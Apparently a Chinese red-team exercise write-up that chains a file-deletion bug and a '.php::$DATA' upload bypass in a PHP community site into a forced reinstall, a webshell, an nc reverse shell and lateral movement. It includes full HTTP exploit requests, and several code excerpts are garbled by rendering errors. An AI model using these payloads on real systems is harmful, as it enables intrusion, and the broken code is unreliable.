记一次攻破网络边界的过程


> 更多黑客技能 公众号:白帽子左一

本文作者: 酒仙桥六号部队-雪狼别动队

来源:https://mp.weixin.qq.com/s/OCGgWAbpWgrrj_UPmGvYLQ

事情是这样的,在某次省hw的时候,对目标进行打点的时候,发现ip下存在四个域名,在一个域名中发现了beifen.zip文件,而网址的功能是一个社区类型的网址。
图片

下载后打开,发现是程序的源码,sql文件都在里面。
图片

找程序中找到的数据库的ip、账号、密码等信息,试试能不能连接。
图片

在这里插入图片描述

审计源码,发现漏洞
既然连接不上,那么只能审计一下源码了,先拿工具扫一下。
图片

经过查看,发现/application/index/controller/system/SystemUpgradeclient.php中的setcopydel方法可以任意提交参数。
图片

可以看到以post方式接收了俩个参数,一个是id,一个是ids
if (is_array(KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ foreach (post[‘ids’] as $file) {
$fileservice->del_dir(ROOT_PATH . ‘public’ . DS . ‘copyfile’ . $file);
}
}

if ($post[‘id’]) {
$copyFile = ROOT_PATH . ‘public’ . DS . ‘copyfile’ . $post[‘id’];
// echo $copyFile;exit;
f i l e s e r v i c e − > d e l f i l e ( fileservice->del_file( fileservice>delfile(copyFile);
}
ids是需要数组的,然后拼接路径,传入 f i l e s e r v i c e − > d e l d i r ( ) 方 法 中 。 i d 没 有 类 型 判 断 , 直 接 拼 接 路 径 传 入 fileservice->del_dir()方法中。 id没有类型判断,直接拼接路径传入 fileservice>deldir()idfileservice->del_file()方法中。
那来看看这俩个方法中做了什么事情。
$fileservice->del_dir()方法是删除目录
图片

删除目录,看来这是一个任意文件删除漏洞,分析下源码。

static function del_dir(KaTeX parse error: Expected '}', got 'EOF' at end of input: … (!file_exists(dirName)) # 判断文件或目录是否存在,不存在就返回false
{
return false;
}
d i r = o p e n d i r ( dir = opendir( dir=opendir(dirName); # 打开一个目录,读取它的内容
while ( f i l e N a m e = r e a d d i r ( fileName = readdir( fileName=readdir(dir))
{
$file = $dirName . ‘/’ . f i l e N a m e ; i f ( fileName; if ( fileName;if(fileName != ‘.’ && KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (is_dir(file)) # 判断是不是目录,是目录就在调用一次本身方法
{
self::del_dir(KaTeX parse error: Expected 'EOF', got '}' at position 20: …); }̲ el…file); # 删除文件
}
}
}
closedir( d i r ) ; r e t u r n r m d i r ( dir); return rmdir( dir);returnrmdir(dirName); # 删除目录
}
$fileservice->del_file()方法是删除文件
图片

这就没有什么好说的了,判断文件是否存在,然后删除。但是,这是hw啊,这漏洞什么用都没有啊,只能继续找其他漏洞了。

经过漫长的查找终于在\application\admin\controller\setting\SystemConfig.php中的发现了view_upload上传的方法。
图片

这个方法中,type为3的时候是上传文件的,然后传入Upload::file方法。
图片

但是在这个方法中判断了后缀名不能为php,但是在win的系统中,可以通过以下的一些方法绕过。
.php.
.php(空格)
.php:1.jpg
.php:: D A T A . p h p : : DATA .php:: DATA.php::DATA…….
等等、、、
经过尝试,发现使用1.php::$DATA这样的方式可以绕过,构造的post数据包为:
POST /index.php/admin/setting.system_config/view_upload.html HTTP/1.1
Host: xxx.com
Content-Length: 403
Cache-Control: max-age=0
Origin: http://xxx.com
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryP7jKNcoemK2sybZb
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Referer: http://xxx.com/index.php/admin/setting.system_config/index_alone?tab_id=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=es9ef1h1c9i0t21brcrlqigfmt
Connection: close

------WebKitFormBoundaryP7jKNcoemK2sybZb
Content-Disposition: form-data; name=“file”

site_logo
------WebKitFormBoundaryP7jKNcoemK2sybZb
Content-Disposition: form-data; name=“type”

3
------WebKitFormBoundaryP7jKNcoemK2sybZb
Content-Disposition: form-data; name=“site_logo”; filename=“1.php::$DATA”
Content-Type: image/png

<?php phpinfo(); ?>

------WebKitFormBoundaryP7jKNcoemK2sybZb–

成功上传文件,但是这个文件上传需要后台登录才能上传,后台之前就已经爆破过了,没有爆破出来账号密码。但是这个程序有install文件,根据经验知道程序安装文件都会在安装后创建一个文件,来判断是否已经安装,所以在看看是否和我想的一样。
图片

可以看到确实是生成了一个install.lock文件来判断是否安装成功,那么我们可以通过之前的任意文件删除漏洞来删除这个文件让系统进行重装。
但是这个删除文件,对系统进行重装,这就得问问裁判组能不能让了啊,经常协商,他们觉得这个程序不重要,在能保证不破坏程序的时候可以做。
既然他们说可以了,那么我就小心翼翼的构造一下post包,别真的给程序破坏了。

利用漏洞拿到shell
删除install.lock文件的数据包:
POST /index.php/admin/system.System_Upgradeclient/setcopydel HTTP/1.1
Host: www.xxx.wang
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.xxx.wang
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.xxx.wang/index.php/admin/system.System_Upgradeclient/setcopydel
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8itmp7itfo1va6uu7bu0ouhgos
Connection: close

id=/…/install/install.lock&ids=1

图片

返回值是成功的,看来没有问题,那就到重装系统的时候了,为了不对系统的数据造成破坏,我们对系统安装需要连接的mysql放到自己的服务器中。
图片

成功登录后台,然后上传shell,还是之前的那个数据包,没有什么好说的,拿到shell后我用nc反弹一下,查看了系统上都有什么程序,发现这个系统上存在五个程序。

在这里插入图片描述
既然上来了,那就收集一下信息,然后把流量代理出去扫描一下,结果发现:
图片

只是扫描了一下下而已,这个多弱口令,这稳了,通过这些弱口令在来做横向移动,一共拿下了近百台的机器,得了3600分。

报告,我已打入敌方内部!
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值